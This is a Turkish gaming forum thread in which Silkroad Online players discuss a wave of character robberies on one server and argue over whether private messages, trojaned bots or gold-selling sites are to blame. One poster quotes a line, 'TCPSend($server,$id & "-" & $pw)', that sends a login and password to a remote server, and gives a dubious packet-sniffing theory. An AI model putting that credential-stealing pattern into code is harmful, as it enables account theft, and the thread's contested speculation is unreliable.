1. Reklam

1. joysro
      ledas
      jungler
      keasro
      zeus
      karantina

Silkroad Büyük ACIK !!

1. Urbanss

Urbanss Gözlemliyorum rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Silkroad Online da buyuk acık var arkadaslar. Nasılmı. 1 haftada Aynı kısı tarafından tam 43 karakter hacklendi. Bu karakter hıc bır sekılde exc kullanmıyor sızınle. Pm atıyor size ve cevap verdıgınız anda sıze 2 dakıka ıcınde ıd pwnızı mesaj olarak gonderıyor. İtemlerınızı alıp stall a koyuyor ve hatta o kadar yuzsuz kı gold karsılıgı ıtemlerınızı gerı satıyor. Suana kadar Malazgirtte 1 haftada 43 kısı soyuldu aynı kısı tarafından. Diğer Serverlarda herhangı bi olayı warmı bılemıyorum fakat Malazgirtte Adeta Kâbus oldu bize. Malazgirtte 2 Nıck ı wardı [1 i şikayet uzerıne banlanınca baska bı uyelıkle yıne basladı son 2 gundur.] Malazgırtte cok kısının canı yandı. Nasıl yaptıgını bılmıyorum fakat bı sekılde pm yoluyla karakterınızın bılgılerıne erısıyor. 2 adet Gold sıtesıne ait carı soydugunu bılıyorum [Unıonumdakı ] . Cok sağlam antıvırusler kullanmalarına ragmen engelleyemedıler. MAlazgirt Server ındakı Nıcklerı

Malaz_R ve Malaz_PK1 dir. Size önerım acık tespıt edılene kadar tanımadıgınız kısılere selam dahi vermeyın.

2. Afgan

Afgan Old School olduser rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    36
    PM yolu İle Hack xD İlginç

3. Urbanss

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Aynen öyle bu kesin thepowerlevel.com 'un işi adamların sitesinde her çeşit item var ^^ itemleri nerden alıyolar sanıyorsn ^^

4. Yukie

Yukie   rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Meslek:
    -PC Donanım ve Yazılım Teknolojileri Uzmanı -Fotoğ
    İnanmıyorum. Yıllar öncesinde Knight Online'dede böyle bir hurafe söz konusu idi. Anlattıklarına göre hacker ":)" gibi bir gülümseme yollayarak istediği kişiyi soyabiliyordu. Ama ne hikmettir hiç öyle birşey olmadığı gibi sadece dedikodu olarak kaldı. Buradada insanları tedirginlik ve sıkıntı vermek gibi bir amacınız olmasın lütfen...

5. Advance

Advance   rank8

Beğenilen Mesajlar:
    16
    Ödül Puanları:
    48
    Joymaxın ip havuzundan karşı tarafın ipsini nasıl buluyor acaba

6. NoMoreLove

NoMoreLove   exlmanager rank8

Beğenilen Mesajlar:
    16
    Ödül Puanları:
    48
    Araya login server giriyor knightta.

Büyük ihtimalle silkroad'da da öyledir..

7. Nebula

Nebula Old School olduser rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Pm yolu ile soyulabileceğine inanasım pek gelmiyor..
    işin içinde loader,bot,yardımcı prog. veya kurbana verilen bir site adresi üzerinden yapılacak bir saldırı olabilir.

8. Urbanss

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Bak şöyle yapıyorlar ;

Bot'un bir server dosyası var. Launch/Start/Başlat her neyse o tuşa bastıktan sonra oyunda geçerli bir ID/PW girmeniz halinde [ Komut şudur ; TCPSend($server,$id & "-" & $pw) ] bot bunu bir yere kaydediyor artık .ini olarak mı kaydeder yoksa bot sunucusunun veritabanına my kaydeder her neyse... Botun scan charının yanından geçince (genelde hotanda ışınlanmanın yanında olur) packet olarak CharID bilgisi geliyor scan charına. Aslında o bilgi o charı gören tüm oyunculara geliyor ama scan charlar oyuna clientless mod ile girerler. CharID verisini alınca selectle scan char bilgilerinize ulaşıyor. Tam emin değilim ama sanırım PM atınca da CharID gidiyor. Malaz_R ve Malaz_PK1 adlı chardan gelen PM'e karşılık verdiğiniz zaman PM şu şekilde yol alır ; PM ---> Joymax PM Sunucusu ---> Malaz_R. Aynı zamanda beraberinde CharID'yi de götürür. Mutlu son, charınız soyulur.

9. wertz

wertz Keşfediyorum rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    thepowerlevel in isi bu yaa.
    ADamlarin her serverda adamlari var.
    Alex_pk alexan_pk diye iki adamida alexanderda var. Adamlar sürekli nova bilmem ne satiyor. Bi gece bunlaradn gold aldim sabaha char soyulmustu ve bneim itemleri bu adamlardaydi.
    Isin ilginc yani ben ogün ayni pc den 2 3 chara birden girdim. Soyulan chardan daha iyi itemleri ve goldu olan diger charima hic dokunulmamis ama gold aldigim char soyulmus:)
    Pc me direk bir virüs felan olsa bütün charlar soyulurdu ama sadece gold aldigim char soyulmus

10. Extrowe

Extrowe   gamer rank8

Beğenilen Mesajlar:
    1
    Ödül Puanları:
    38
    Meslek:
    Öğrenci
    Pm yolu ile soymak pek mantıklı gelmiyor bana :detective:

11. Warrison1

Warrison1 Bilgiliyim rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Meslek:
    WebMaster Öğrenci
    albendende o kadar, arkadaşlar bundan sonra alışveriş yaptıgımız sitelere dikkat edelim bence :!:

12. Nina Ricci

Nina Ricci   exlmanager rank8

Beğenilen Mesajlar:
    10
    Ödül Puanları:
    38
    geçiniz.com

13. SilentLord

SilentLord Bilgiliyim rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Meslek:
    Öğrenci
    :nod:

14. _ThE_END

_ThE_END Öğreniyorum rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
  15. IslamicCc

IslamicCc Tanınıyorum rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    SiLKRoaD NaSıL oYNaNıR,"konum"uz bu çocuklar..!
    pm ile hack yapmak net dünyasının sonu demektır :)

16. Urbanss

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Thepowerlevel.com 'un işi bu tatikleri söyle ;

Bot'un bir server dosyası var. Launch/Start/Başlat her neyse o tuşa bastıktan sonra oyunda geçerli bir ID/PW girmeniz halinde [ Komut şudur ; TCPSend($server,$id & "-" & $pw) ] bot bunu bir yere kaydediyor artık .ini olarak mı kaydeder yoksa bot sunucusunun veritabanına my kaydeder her neyse... Botun scan charının yanından geçince (genelde hotanda ışınlanmanın yanında olur) packet olarak CharID bilgisi geliyor scan charına. Aslında o bilgi o charı gören tüm oyunculara geliyor ama scan charlar oyuna clientless mod ile girerler. CharID verisini alınca selectle scan char bilgilerinize ulaşıyor. Tam emin değilim ama sanırım PM atınca da CharID gidiyor. Malaz_R ve Malaz_PK1 adlı chardan gelen PM'e karşılık verdiğiniz zaman PM şu şekilde yol alır ; PM ---> Joymax PM Sunucusu ---> Malaz_R. Aynı zamanda beraberinde CharID'yi de götürür. Mutlu son, charınız soyulur.

17. Galliport

Galliport Bilgiliyim rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    36
    Meslek:
    PC Donanım
    pm den hack ihtimali bile yok neredeyse takas ederken soyulabilirsin veya kullandığın programda virüs var ise soyulabilirsin GameGuard açık değilken oyunda isen ki bu bazı botlarda oluyor hacklenme riskin artar yıllardır srobot kullanıyorum 1 kere bile soyulmadım 1 kere bile.Biraz dikkat sadece.

18. eLempTRa

eLempTRa Bilgiliyim rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    bıs charın yanından gecen bır charın bılgılerını alması mumkun degildır bu ıste bi is var yada geçiniz.com

19. Urbanss

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    Adamlar yapıyor beyler geçiniz felan demeyin ^^ Serverin ilk 4 veya 5 harfini alıyolar sonuna _R veya _PK ekliyolar

Örn; Malaz_R Tibet_PK Casp_R

20. EoBliss

EoBliss Keşfediyorum rank8

Beğenilen Mesajlar:
    0
    Ödül Puanları:
    0
    12.5 yaşındaydım. Yine vardı böyle hurafeler.. 5 yıl önce asdasd :D